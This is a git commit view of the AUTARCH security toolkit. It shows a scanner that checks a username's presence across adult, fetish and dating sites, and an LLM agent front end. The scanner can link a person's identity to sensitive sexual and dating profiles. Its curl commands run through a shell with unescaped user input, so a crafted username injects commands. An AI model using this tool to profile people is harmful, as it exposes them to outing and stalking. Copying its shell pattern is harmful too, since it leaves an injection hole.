Autarch Will Control The Internet

This commit is contained in:
DigiJ
2026-03-13 15:17:15 -07:00
commit 4d3570781e
401 changed files with 484494 additions and 0 deletions

1
modules/__init__.py Normal file
View File

@@ -0,0 +1 @@
# AUTARCH Modules

1594
modules/ad_audit.py Normal file

File diff suppressed because it is too large Load Diff

847
modules/adultscan.py Normal file
View File

@@ -0,0 +1,847 @@
"""
AUTARCH Adult Site Scanner Module
Username OSINT for adult-oriented platforms
Searches usernames across adult content sites, fanfiction platforms,
and related communities.
"""
import sys
import subprocess
import re
import json
from pathlib import Path
from urllib.parse import quote
from concurrent.futures import ThreadPoolExecutor, as_completed
# Module metadata
DESCRIPTION = "Adult site username OSINT scanner"
AUTHOR = "darkHal"
VERSION = "1.3"
CATEGORY = "osint"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
from core.config import get_config
# Custom sites storage file
from core.paths import get_app_dir as _app_dir
CUSTOM_SITES_FILE = _app_dir() / "custom_adultsites.json"
# Bulk import file
BULK_IMPORT_FILE = _app_dir() / "custom_sites.inf"
# Common username URL patterns for auto-detection
COMMON_PATTERNS = [
'/user/{}',
'/users/{}',
'/u/{}',
'/profile/{}',
'/profiles/{}',
'/member/{}',
'/members/{}',
'/@{}',
'/{}',
'/people/{}',
'/account/{}',
'/id/{}',
'/{}/profile',
'/user/{}/profile',
'/channel/{}',
'/c/{}',
'/p/{}',
]
class AdultScanner:
"""Username scanner for adult-oriented sites."""
# Default site definitions: (name, url_template, method)
# method: 'status' = check HTTP status, 'content' = check page content
DEFAULT_SITES = {
# Fanfiction & Story Sites
'fanfiction': [
('Archive of Our Own', 'https://archiveofourown.org/users/{}/profile', 'status'),
('FanFiction.net', 'https://www.fanfiction.net/u/0/{}', 'content'),
('FimFiction', 'https://www.fimfiction.net/user/{}', 'status'),
('Wattpad', 'https://www.wattpad.com/user/{}', 'status'),
('Literotica', 'https://www.literotica.com/stories/memberpage.php?uid=0&username={}', 'content'),
('Adult-FanFiction', 'http://members.adult-fanfiction.org/profile.php?no=0&uname={}', 'content'),
('Hentai Foundry', 'https://www.hentai-foundry.com/user/{}/profile', 'status'),
('SoFurry', 'https://www.sofurry.com/browse/user/{}', 'status'),
('Inkbunny', 'https://inkbunny.net/{}', 'status'),
],
# Art & Creative
'art': [
('DeviantArt', 'https://www.deviantart.com/{}', 'status'),
('Fur Affinity', 'https://www.furaffinity.net/user/{}/', 'status'),
('Newgrounds', 'https://{}.newgrounds.com', 'status'),
('Pixiv', 'https://www.pixiv.net/en/users/{}', 'content'),
('Rule34', 'https://rule34.xxx/index.php?page=account&s=profile&uname={}', 'content'),
('e621', 'https://e621.net/users?name={}', 'content'),
('Derpibooru', 'https://derpibooru.org/profiles/{}', 'status'),
('Twitter/X', 'https://twitter.com/{}', 'status'),
('Tumblr', 'https://{}.tumblr.com', 'status'),
('Pillowfort', 'https://www.pillowfort.social/{}', 'status'),
],
# Video & Streaming
'video': [
('Pornhub', 'https://www.pornhub.com/users/{}', 'status'),
('XVideos', 'https://www.xvideos.com/profiles/{}', 'status'),
('xHamster', 'https://xhamster.com/users/{}', 'status'),
('Chaturbate', 'https://chaturbate.com/{}/', 'status'),
('OnlyFans', 'https://onlyfans.com/{}', 'status'),
('Fansly', 'https://fansly.com/{}', 'status'),
('ManyVids', 'https://www.manyvids.com/Profile/0/{}/', 'content'),
('PocketStars', 'https://pocketstars.com/{}', 'status'),
],
# Forums & Communities
'forums': [
('Reddit', 'https://www.reddit.com/user/{}', 'status'),
('F-List', 'https://www.f-list.net/c/{}', 'status'),
('FetLife', 'https://fetlife.com/users/{}', 'content'),
('Kink.com', 'https://www.kink.com/model/{}', 'content'),
('BDSMLR', 'https://{}.bdsmlr.com', 'status'),
('CollarSpace', 'https://www.collarspace.com/view/{}', 'content'),
],
# Dating & Social
'dating': [
('AdultFriendFinder', 'https://adultfriendfinder.com/p/{}', 'content'),
('Ashley Madison', 'https://www.ashleymadison.com/{}', 'content'),
('Grindr', 'https://www.grindr.com/{}', 'content'),
('Scruff', 'https://www.scruff.com/{}', 'content'),
('Recon', 'https://www.recon.com/{}', 'content'),
],
# Gaming Related (with adult content)
'gaming': [
('F95zone', 'https://f95zone.to/members/?username={}', 'content'),
('LoversLab', 'https://www.loverslab.com/profile/?name={}', 'content'),
('ULMF', 'https://ulmf.org/member.php?username={}', 'content'),
('Nutaku', 'https://www.nutaku.net/user/{}/', 'content'),
],
}
def __init__(self):
self.results = []
self.config = get_config()
osint_settings = self.config.get_osint_settings()
self.timeout = osint_settings['timeout']
self.max_threads = osint_settings['max_threads']
# Copy default sites and add custom sites
self.sites = {k: list(v) for k, v in self.DEFAULT_SITES.items()}
self.sites['custom'] = []
self.load_custom_sites()
def load_custom_sites(self):
"""Load custom sites from JSON file."""
if CUSTOM_SITES_FILE.exists():
try:
with open(CUSTOM_SITES_FILE, 'r') as f:
data = json.load(f)
self.sites['custom'] = [tuple(site) for site in data.get('sites', [])]
except Exception as e:
self.sites['custom'] = []
def save_custom_sites(self):
"""Save custom sites to JSON file."""
try:
data = {'sites': [list(site) for site in self.sites['custom']]}
with open(CUSTOM_SITES_FILE, 'w') as f:
json.dump(data, f, indent=2)
return True
except Exception as e:
return False
def add_custom_site(self):
"""Interactively add a custom site."""
print(f"\n{Colors.BOLD}Add Custom Site{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
print()
print(f"{Colors.CYAN}URL Pattern Format:{Colors.RESET}")
print(f" Use {Colors.YELLOW}*{Colors.RESET} where the username should go")
print(f" Example: {Colors.DIM}https://example.com/user/*{Colors.RESET}")
print(f" Example: {Colors.DIM}https://example.com/profile?name=*{Colors.RESET}")
print()
# Get site name
name = input(f"{Colors.WHITE}Site name: {Colors.RESET}").strip()
if not name:
self.print_status("Cancelled - no name provided", "warning")
return
# Get URL pattern
url_pattern = input(f"{Colors.WHITE}URL pattern (use * for username): {Colors.RESET}").strip()
if not url_pattern:
self.print_status("Cancelled - no URL provided", "warning")
return
if '*' not in url_pattern:
self.print_status("URL must contain * for username placeholder", "error")
return
# Convert * to {} for internal format
url_template = url_pattern.replace('*', '{}')
# Ensure URL has protocol
if not url_template.startswith('http://') and not url_template.startswith('https://'):
url_template = 'https://' + url_template
# Get detection method
print()
print(f"{Colors.CYAN}Detection Method:{Colors.RESET}")
print(f" {Colors.GREEN}[1]{Colors.RESET} Status code (default) - Check HTTP response code")
print(f" {Colors.GREEN}[2]{Colors.RESET} Content - For sites with custom 404 pages")
method_choice = input(f"{Colors.WHITE}Select [1]: {Colors.RESET}").strip() or "1"
method = 'content' if method_choice == '2' else 'status'
# Add to custom sites
new_site = (name, url_template, method)
self.sites['custom'].append(new_site)
# Save to file
if self.save_custom_sites():
self.print_status(f"Added '{name}' to custom sites", "success")
print(f"{Colors.DIM} URL: {url_template.replace('{}', '<username>')}{Colors.RESET}")
else:
self.print_status("Failed to save custom sites", "error")
def manage_custom_sites(self):
"""View and manage custom sites."""
while True:
clear_screen()
display_banner()
print(f"{Colors.BOLD}Manage Custom Sites{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
print()
custom = self.sites.get('custom', [])
if not custom:
print(f"{Colors.YELLOW}No custom sites added yet.{Colors.RESET}")
print()
print(f" {Colors.GREEN}[1]{Colors.RESET} Add New Site")
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip()
if choice == "1":
self.add_custom_site()
else:
break
else:
print(f"{Colors.CYAN}Custom Sites ({len(custom)}):{Colors.RESET}")
print()
for i, (name, url, method) in enumerate(custom, 1):
display_url = url.replace('{}', '*')
method_tag = f"[{method}]"
print(f" {Colors.GREEN}[{i}]{Colors.RESET} {name:25} {Colors.DIM}{method_tag}{Colors.RESET}")
print(f" {Colors.DIM}{display_url}{Colors.RESET}")
print()
print(f" {Colors.GREEN}[A]{Colors.RESET} Add New Site")
print(f" {Colors.RED}[R]{Colors.RESET} Remove Site")
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip().upper()
if choice == "0":
break
elif choice == "A":
self.add_custom_site()
elif choice == "R":
self.remove_custom_site()
def remove_custom_site(self):
"""Remove a custom site."""
custom = self.sites.get('custom', [])
if not custom:
self.print_status("No custom sites to remove", "warning")
return
print()
idx_input = input(f"{Colors.WHITE}Enter site number to remove: {Colors.RESET}").strip()
try:
idx = int(idx_input) - 1
if 0 <= idx < len(custom):
removed = custom.pop(idx)
if self.save_custom_sites():
self.print_status(f"Removed '{removed[0]}'", "success")
else:
self.print_status("Failed to save changes", "error")
else:
self.print_status("Invalid selection", "error")
except ValueError:
self.print_status("Invalid number", "error")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def auto_detect_site(self):
"""Auto-detect URL pattern for a domain."""
print(f"\n{Colors.BOLD}Auto-Detect Site Pattern{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
print()
print(f"{Colors.CYAN}Enter just the domain name and we'll find the pattern.{Colors.RESET}")
print(f"{Colors.DIM}Example: example.com or www.example.com{Colors.RESET}")
print()
# Get domain
domain = input(f"{Colors.WHITE}Domain: {Colors.RESET}").strip()
if not domain:
self.print_status("Cancelled - no domain provided", "warning")
return
# Clean up domain
domain = domain.replace('https://', '').replace('http://', '').rstrip('/')
# Get test username
print()
print(f"{Colors.CYAN}We need a known username to test patterns.{Colors.RESET}")
print(f"{Colors.DIM}Enter a username that you know EXISTS on this site.{Colors.RESET}")
test_user = input(f"{Colors.WHITE}Test username: {Colors.RESET}").strip()
if not test_user:
self.print_status("Cancelled - no test username provided", "warning")
return
print(f"\n{Colors.CYAN}Testing {len(COMMON_PATTERNS)} common URL patterns...{Colors.RESET}\n")
# Test each pattern
working_patterns = []
for i, pattern in enumerate(COMMON_PATTERNS):
url = f"https://{domain}{pattern}".format(test_user)
print(f"\r{Colors.DIM} Testing pattern {i+1}/{len(COMMON_PATTERNS)}: {pattern}{' ' * 20}{Colors.RESET}", end="")
cmd = f"curl -sI -o /dev/null -w '%{{http_code}}' -L --max-time 5 '{url}' 2>/dev/null"
success, output, _ = self.run_cmd(cmd, 7)
if success:
status_code = output.strip()
if status_code in ['200', '301', '302']:
working_patterns.append((pattern, status_code, url))
print(f"\r{' ' * 80}\r", end="") # Clear line
if not working_patterns:
print(f"{Colors.YELLOW}No working patterns found.{Colors.RESET}")
print(f"{Colors.DIM}The site may use a non-standard URL format.{Colors.RESET}")
print(f"{Colors.DIM}Try using manual add [A] with the correct URL pattern.{Colors.RESET}")
return
# Display working patterns
print(f"{Colors.GREEN}Found {len(working_patterns)} working pattern(s):{Colors.RESET}\n")
for i, (pattern, status, url) in enumerate(working_patterns, 1):
status_info = "OK" if status == '200' else f"redirect ({status})"
print(f" {Colors.GREEN}[{i}]{Colors.RESET} {pattern:20} {Colors.DIM}({status_info}){Colors.RESET}")
print(f" {Colors.DIM}{url}{Colors.RESET}")
print()
# Let user select
print(f" {Colors.DIM}[0]{Colors.RESET} Cancel")
print()
choice = input(f"{Colors.WHITE}Select pattern to add: {Colors.RESET}").strip()
try:
idx = int(choice) - 1
if 0 <= idx < len(working_patterns):
selected_pattern, status, _ = working_patterns[idx]
url_template = f"https://{domain}{selected_pattern}"
# Get site name
default_name = domain.split('.')[0].title()
name = input(f"{Colors.WHITE}Site name [{default_name}]: {Colors.RESET}").strip() or default_name
# Determine method based on status
method = 'status' if status == '200' else 'content'
# Add to custom sites
new_site = (name, url_template, method)
self.sites['custom'].append(new_site)
if self.save_custom_sites():
self.print_status(f"Added '{name}' to custom sites", "success")
print(f"{Colors.DIM} Pattern: {url_template.replace('{}', '*')}{Colors.RESET}")
else:
self.print_status("Failed to save custom sites", "error")
elif choice != "0":
self.print_status("Cancelled", "warning")
except ValueError:
if choice != "0":
self.print_status("Invalid selection", "error")
def probe_domain(self, domain: str, test_user: str, quiet: bool = False) -> list:
"""Probe a domain for working URL patterns. Returns list of (pattern, status_code, url)."""
domain = domain.replace('https://', '').replace('http://', '').rstrip('/')
working_patterns = []
for i, pattern in enumerate(COMMON_PATTERNS):
url = f"https://{domain}{pattern}".format(test_user)
if not quiet:
print(f"\r{Colors.DIM} Testing {domain}: pattern {i+1}/{len(COMMON_PATTERNS)}{' ' * 20}{Colors.RESET}", end="")
cmd = f"curl -sI -o /dev/null -w '%{{http_code}}' -L --max-time 5 '{url}' 2>/dev/null"
success, output, _ = self.run_cmd(cmd, 7)
if success:
status_code = output.strip()
if status_code in ['200', '301', '302']:
working_patterns.append((pattern, status_code, url))
# For bulk mode, take first working pattern and stop
if quiet:
break
if not quiet:
print(f"\r{' ' * 80}\r", end="")
return working_patterns
def bulk_import(self):
"""Bulk import sites from custom_sites.inf file."""
print(f"\n{Colors.BOLD}Bulk Import Sites{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
print()
# Check if file exists, create template if not
if not BULK_IMPORT_FILE.exists():
print(f"{Colors.YELLOW}Bulk import file not found.{Colors.RESET}")
print(f"{Colors.DIM}Creating template at: {BULK_IMPORT_FILE}{Colors.RESET}")
print()
create = input(f"{Colors.WHITE}Create template file? (y/n): {Colors.RESET}").strip().lower()
if create == 'y':
template = """# AUTARCH Adult Site Scanner - Bulk Import File
# Add one domain per line (without http:// or https://)
# Lines starting with # are comments
#
# Example:
# example.com
# another-site.net
# subdomain.site.org
#
# After adding domains, run Bulk Import [B] again
# and provide a test username that exists on these sites.
"""
with open(BULK_IMPORT_FILE, 'w') as f:
f.write(template)
self.print_status(f"Created {BULK_IMPORT_FILE}", "success")
print(f"{Colors.DIM}Edit this file and add domains, then run Bulk Import again.{Colors.RESET}")
return
# Read domains from file
domains = []
with open(BULK_IMPORT_FILE, 'r') as f:
for line in f:
line = line.strip()
# Skip empty lines and comments
if line and not line.startswith('#'):
# Clean up domain
domain = line.replace('https://', '').replace('http://', '').rstrip('/')
if domain:
domains.append(domain)
if not domains:
print(f"{Colors.YELLOW}No domains found in {BULK_IMPORT_FILE.name}{Colors.RESET}")
print(f"{Colors.DIM}Add domains (one per line) and try again.{Colors.RESET}")
return
print(f"{Colors.CYAN}Found {len(domains)} domain(s) in {BULK_IMPORT_FILE.name}:{Colors.RESET}")
for d in domains[:10]:
print(f" {Colors.DIM}-{Colors.RESET} {d}")
if len(domains) > 10:
print(f" {Colors.DIM}... and {len(domains) - 10} more{Colors.RESET}")
print()
# Check which domains are already added
existing_domains = set()
for name, url, method in self.sites.get('custom', []):
# Extract domain from URL template
try:
from urllib.parse import urlparse
parsed = urlparse(url.replace('{}', 'test'))
existing_domains.add(parsed.netloc.lower())
except:
pass
new_domains = [d for d in domains if d.lower() not in existing_domains]
skipped = len(domains) - len(new_domains)
if skipped > 0:
print(f"{Colors.YELLOW}Skipping {skipped} already-added domain(s){Colors.RESET}")
if not new_domains:
print(f"{Colors.GREEN}All domains already added!{Colors.RESET}")
return
print(f"{Colors.CYAN}Will scan {len(new_domains)} new domain(s){Colors.RESET}")
print()
# Get test username
print(f"{Colors.CYAN}We need a test username to probe URL patterns.{Colors.RESET}")
print(f"{Colors.DIM}Use a common username that likely exists on most sites.{Colors.RESET}")
print(f"{Colors.DIM}Example: admin, test, user, john, etc.{Colors.RESET}")
print()
test_user = input(f"{Colors.WHITE}Test username: {Colors.RESET}").strip()
if not test_user:
self.print_status("Cancelled - no test username provided", "warning")
return
print(f"\n{Colors.CYAN}Scanning {len(new_domains)} domains...{Colors.RESET}\n")
# Scan each domain
added = 0
failed = []
for i, domain in enumerate(new_domains):
print(f"{Colors.DIM}[{i+1}/{len(new_domains)}] Scanning {domain}...{Colors.RESET}")
# Use quiet mode to get first working pattern
patterns = self.probe_domain(domain, test_user, quiet=True)
if patterns:
pattern, status, url = patterns[0]
url_template = f"https://{domain}{pattern}"
name = domain.split('.')[0].title()
method = 'status' if status == '200' else 'content'
# Add to custom sites
new_site = (name, url_template, method)
self.sites['custom'].append(new_site)
added += 1
print(f" {Colors.GREEN}[+]{Colors.RESET} Added {name}: {pattern}")
else:
failed.append(domain)
print(f" {Colors.RED}[X]{Colors.RESET} No pattern found")
# Save results
if added > 0:
if self.save_custom_sites():
print(f"\n{Colors.GREEN}Successfully added {added} site(s){Colors.RESET}")
else:
print(f"\n{Colors.RED}Failed to save custom sites{Colors.RESET}")
if failed:
print(f"\n{Colors.YELLOW}Failed to detect patterns for {len(failed)} domain(s):{Colors.RESET}")
for d in failed[:5]:
print(f" {Colors.DIM}-{Colors.RESET} {d}")
if len(failed) > 5:
print(f" {Colors.DIM}... and {len(failed) - 5} more{Colors.RESET}")
print(f"{Colors.DIM}Try adding these manually with [A] or [D]{Colors.RESET}")
# Offer to clear the import file
print()
clear_file = input(f"{Colors.WHITE}Clear import file? (y/n): {Colors.RESET}").strip().lower()
if clear_file == 'y':
# Keep the header comments
header = """# AUTARCH Adult Site Scanner - Bulk Import File
# Add one domain per line (without http:// or https://)
# Lines starting with # are comments
"""
with open(BULK_IMPORT_FILE, 'w') as f:
f.write(header)
self.print_status("Import file cleared", "success")
def print_status(self, message: str, status: str = "info"):
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
def run_cmd(self, cmd: str, timeout: int = 10) -> tuple:
try:
result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
return result.returncode == 0, result.stdout.strip(), result.stderr.strip()
except subprocess.TimeoutExpired:
return False, "", "timeout"
except Exception as e:
return False, "", str(e)
def check_site(self, site_info: tuple, username: str) -> dict:
"""Check if username exists on a site."""
name, url_template, method = site_info
# Handle special URL formats
if '{}' in url_template:
url = url_template.format(username)
else:
url = url_template + username
result = {
'site': name,
'url': url,
'found': False,
'status': 'unknown'
}
# Use curl to check
cmd = f"curl -sI -o /dev/null -w '%{{http_code}}' -L --max-time {self.timeout} '{url}' 2>/dev/null"
success, output, _ = self.run_cmd(cmd, self.timeout + 2)
if success:
status_code = output.strip()
if method == 'status':
# Check HTTP status code
if status_code == '200':
result['found'] = True
result['status'] = 'found'
elif status_code in ['301', '302']:
result['found'] = True
result['status'] = 'redirect'
elif status_code == '404':
result['status'] = 'not_found'
else:
result['status'] = f'http_{status_code}'
else:
# For content-based checks, we need to fetch the page
if status_code == '200':
# Could do content analysis here
result['found'] = True
result['status'] = 'possible'
elif status_code == '404':
result['status'] = 'not_found'
else:
result['status'] = f'http_{status_code}'
else:
result['status'] = 'error'
return result
def scan_username(self, username: str, categories: list = None):
"""Scan username across selected site categories."""
if categories is None:
categories = list(self.sites.keys())
# Collect all sites to scan
sites_to_scan = []
for cat in categories:
if cat in self.sites:
sites_to_scan.extend(self.sites[cat])
print(f"\n{Colors.CYAN}Scanning {len(sites_to_scan)} sites for username: {username}{Colors.RESET}")
print(f"{Colors.DIM}This may take a few minutes...{Colors.RESET}\n")
self.results = []
found_count = 0
# Use thread pool for parallel scanning
with ThreadPoolExecutor(max_workers=self.max_threads) as executor:
futures = {executor.submit(self.check_site, site, username): site for site in sites_to_scan}
for i, future in enumerate(as_completed(futures)):
result = future.result()
self.results.append(result)
# Display progress
if result['found']:
found_count += 1
status_color = Colors.GREEN if result['status'] == 'found' else Colors.YELLOW
print(f" {status_color}[+]{Colors.RESET} {result['site']:25} {result['url']}")
else:
# Show progress indicator
print(f"\r{Colors.DIM} Checked {i+1}/{len(sites_to_scan)} sites, found {found_count}...{Colors.RESET}", end="")
print(f"\r{' ' * 60}\r", end="") # Clear progress line
return self.results
def display_results(self):
"""Display scan results."""
found = [r for r in self.results if r['found']]
not_found = [r for r in self.results if not r['found']]
print(f"\n{Colors.BOLD}{'' * 60}{Colors.RESET}")
print(f"{Colors.BOLD}Scan Results{Colors.RESET}")
print(f"{Colors.BOLD}{'' * 60}{Colors.RESET}\n")
if found:
print(f"{Colors.GREEN}Found ({len(found)} sites):{Colors.RESET}\n")
for r in found:
status_note = f" ({r['status']})" if r['status'] not in ['found'] else ""
print(f" {Colors.GREEN}+{Colors.RESET} {r['site']:25} {r['url']}{Colors.DIM}{status_note}{Colors.RESET}")
else:
print(f"{Colors.YELLOW}No profiles found.{Colors.RESET}")
print(f"\n{Colors.DIM}Total sites checked: {len(self.results)}{Colors.RESET}")
print(f"{Colors.DIM}Profiles found: {len(found)}{Colors.RESET}")
def export_results(self, filename: str):
"""Export results to file."""
found = [r for r in self.results if r['found']]
with open(filename, 'w') as f:
f.write(f"Username OSINT Results\n")
f.write(f"{'=' * 50}\n\n")
f.write(f"Found Profiles ({len(found)}):\n\n")
for r in found:
f.write(f"{r['site']}: {r['url']}\n")
self.print_status(f"Results exported to {filename}", "success")
def show_menu(self):
"""Display main menu."""
clear_screen()
display_banner()
print(f"{Colors.GREEN}{Colors.BOLD} Adult Site Scanner{Colors.RESET}")
print(f"{Colors.DIM} Username OSINT for adult platforms{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
# Show category counts
total = sum(len(sites) for sites in self.sites.values())
custom_count = len(self.sites.get('custom', []))
print(f"{Colors.DIM} Sites in database: {total} ({custom_count} custom){Colors.RESET}")
print()
print(f" {Colors.CYAN}Scan Categories:{Colors.RESET}")
print(f" {Colors.GREEN}[1]{Colors.RESET} Full Scan (all categories)")
print(f" {Colors.GREEN}[2]{Colors.RESET} Fanfiction & Story Sites")
print(f" {Colors.GREEN}[3]{Colors.RESET} Art & Creative Sites")
print(f" {Colors.GREEN}[4]{Colors.RESET} Video & Streaming Sites")
print(f" {Colors.GREEN}[5]{Colors.RESET} Forums & Communities")
print(f" {Colors.GREEN}[6]{Colors.RESET} Dating & Social Sites")
print(f" {Colors.GREEN}[7]{Colors.RESET} Gaming Related Sites")
print(f" {Colors.GREEN}[8]{Colors.RESET} Custom Sites Only")
print(f" {Colors.GREEN}[9]{Colors.RESET} Custom Category Selection")
print()
print(f" {Colors.CYAN}Site Management:{Colors.RESET}")
print(f" {Colors.GREEN}[A]{Colors.RESET} Add Custom Site (manual)")
print(f" {Colors.GREEN}[D]{Colors.RESET} Auto-Detect Site Pattern")
print(f" {Colors.GREEN}[B]{Colors.RESET} Bulk Import from File")
print(f" {Colors.GREEN}[M]{Colors.RESET} Manage Custom Sites")
print(f" {Colors.GREEN}[L]{Colors.RESET} List All Sites")
print()
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
def select_categories(self) -> list:
"""Let user select multiple categories."""
print(f"\n{Colors.BOLD}Select Categories (comma-separated):{Colors.RESET}")
print()
cat_list = list(self.sites.keys())
for i, cat in enumerate(cat_list, 1):
count = len(self.sites[cat])
print(f" [{i}] {cat.title():20} ({count} sites)")
print()
selection = input(f"{Colors.WHITE}Enter numbers (e.g., 1,2,3): {Colors.RESET}").strip()
selected = []
try:
for num in selection.split(','):
idx = int(num.strip()) - 1
if 0 <= idx < len(cat_list):
selected.append(cat_list[idx])
except:
pass
return selected if selected else None
def list_sites(self):
"""List all sites in database."""
clear_screen()
display_banner()
print(f"{Colors.BOLD}Site Database{Colors.RESET}")
print(f"{Colors.DIM}{'' * 60}{Colors.RESET}\n")
for category, sites in self.sites.items():
if not sites:
continue
color = Colors.YELLOW if category == 'custom' else Colors.GREEN
print(f"{color}{category.upper()} ({len(sites)} sites){Colors.RESET}")
for name, url, method in sites:
if category == 'custom':
display_url = url.replace('{}', '*')
print(f" {Colors.DIM}-{Colors.RESET} {name} {Colors.DIM}({display_url}){Colors.RESET}")
else:
print(f" {Colors.DIM}-{Colors.RESET} {name}")
print()
input(f"{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def run_scan(self, categories: list = None):
"""Run a scan with given categories."""
username = input(f"\n{Colors.WHITE}Enter username to search: {Colors.RESET}").strip()
if not username:
return
self.scan_username(username, categories)
self.display_results()
# Export option
export = input(f"\n{Colors.WHITE}Export results to file? (y/n): {Colors.RESET}").strip().lower()
if export == 'y':
filename = f"{username}_adultscan.txt"
self.export_results(filename)
def run(self):
"""Main loop."""
while True:
self.show_menu()
try:
choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip().upper()
if choice == "0":
break
elif choice == "1":
self.run_scan() # All categories
elif choice == "2":
self.run_scan(['fanfiction'])
elif choice == "3":
self.run_scan(['art'])
elif choice == "4":
self.run_scan(['video'])
elif choice == "5":
self.run_scan(['forums'])
elif choice == "6":
self.run_scan(['dating'])
elif choice == "7":
self.run_scan(['gaming'])
elif choice == "8":
if self.sites.get('custom'):
self.run_scan(['custom'])
else:
self.print_status("No custom sites added yet. Use [A] to add sites.", "warning")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
continue
elif choice == "9":
cats = self.select_categories()
if cats:
self.run_scan(cats)
elif choice == "A":
self.add_custom_site()
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
continue
elif choice == "D":
self.auto_detect_site()
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
continue
elif choice == "B":
self.bulk_import()
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
continue
elif choice == "M":
self.manage_custom_sites()
continue
elif choice == "L":
self.list_sites()
continue
if choice in ["1", "2", "3", "4", "5", "6", "7", "8", "9"]:
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
except (EOFError, KeyboardInterrupt):
break
def run():
AdultScanner().run()
if __name__ == "__main__":
run()

181
modules/agent.py Normal file
View File

@@ -0,0 +1,181 @@
"""
AUTARCH Agent Module
Interactive interface for running autonomous agent tasks
This module provides an interface to give tasks to the autonomous agent
and watch it work through them step by step.
"""
import sys
from pathlib import Path
# Module metadata
DESCRIPTION = "Autonomous agent for task execution"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "core"
# Add parent directory to path
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.agent import Agent, AgentState, AgentStep, AgentResult
from core.tools import get_tool_registry
from core.llm import get_llm, LLMError
from core.banner import Colors, clear_screen, display_banner
class AgentInterface:
"""Interactive interface for the AUTARCH agent."""
def __init__(self):
self.agent = None
self.llm = get_llm()
self.tools = get_tool_registry()
def print_status(self, message: str, status: str = "info"):
"""Print a status message."""
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
def print_header(self, text: str):
"""Print a section header."""
print(f"\n{Colors.BOLD}{Colors.WHITE}{text}{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
def show_tools(self):
"""Display available tools."""
self.print_header("Available Tools")
tools = self.tools.list_tools()
for tool in tools:
print(f"\n {Colors.CYAN}{tool.name}{Colors.RESET} [{tool.category}]")
print(f" {Colors.DIM}{tool.description}{Colors.RESET}")
if tool.parameters:
for param in tool.parameters:
req = "*" if param.required else ""
print(f" - {param.name}{req}: {param.description}")
def on_step_callback(self, step: AgentStep):
"""Callback for when agent completes a step."""
print(f"\n{Colors.DIM}{'' * 40}{Colors.RESET}")
def on_state_callback(self, state: AgentState):
"""Callback for agent state changes."""
state_colors = {
AgentState.IDLE: Colors.WHITE,
AgentState.THINKING: Colors.MAGENTA,
AgentState.EXECUTING: Colors.BLUE,
AgentState.WAITING_USER: Colors.YELLOW,
AgentState.COMPLETE: Colors.GREEN,
AgentState.ERROR: Colors.RED,
}
color = state_colors.get(state, Colors.WHITE)
# Only show state for key transitions
if state in [AgentState.COMPLETE, AgentState.ERROR]:
print(f"{color}[State: {state.value}]{Colors.RESET}")
def run_task(self, task: str) -> AgentResult:
"""Run a task through the agent.
Args:
task: Task description.
Returns:
AgentResult with execution details.
"""
self.agent = Agent(
llm=self.llm,
tools=self.tools,
max_steps=20,
verbose=True
)
self.agent.on_step = self.on_step_callback
self.agent.on_state_change = self.on_state_callback
return self.agent.run(task)
def interactive_loop(self):
"""Run interactive task input loop."""
self.print_header("Agent Interface")
print(f"\n{Colors.WHITE}Enter a task for the agent to complete.")
print(f"Type 'tools' to see available tools.")
print(f"Type 'exit' to return to main menu.{Colors.RESET}\n")
while True:
try:
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
task = input(f"\n{Colors.GREEN}Task:{Colors.RESET} ").strip()
if not task:
continue
if task.lower() == 'exit':
break
if task.lower() == 'tools':
self.show_tools()
continue
if task.lower() == 'help':
print(f"\n{Colors.WHITE}Commands:{Colors.RESET}")
print(f" {Colors.CYAN}tools{Colors.RESET} - Show available tools")
print(f" {Colors.CYAN}exit{Colors.RESET} - Return to main menu")
print(f" {Colors.CYAN}help{Colors.RESET} - Show this help")
print(f"\n{Colors.WHITE}Or enter a task description for the agent.{Colors.RESET}")
continue
# Run the task
print(f"\n{Colors.CYAN}[*] Starting agent...{Colors.RESET}\n")
result = self.run_task(task)
# Show result summary
print(f"\n{Colors.DIM}{'' * 50}{Colors.RESET}")
if result.success:
print(f"{Colors.GREEN}[+] Task completed successfully{Colors.RESET}")
print(f"\n{Colors.WHITE}Summary:{Colors.RESET} {result.summary}")
else:
print(f"{Colors.RED}[X] Task failed{Colors.RESET}")
if result.error:
print(f"{Colors.RED}Error:{Colors.RESET} {result.error}")
if result.summary:
print(f"{Colors.WHITE}Summary:{Colors.RESET} {result.summary}")
print(f"\n{Colors.DIM}Steps taken: {len(result.steps)}{Colors.RESET}")
except (EOFError, KeyboardInterrupt):
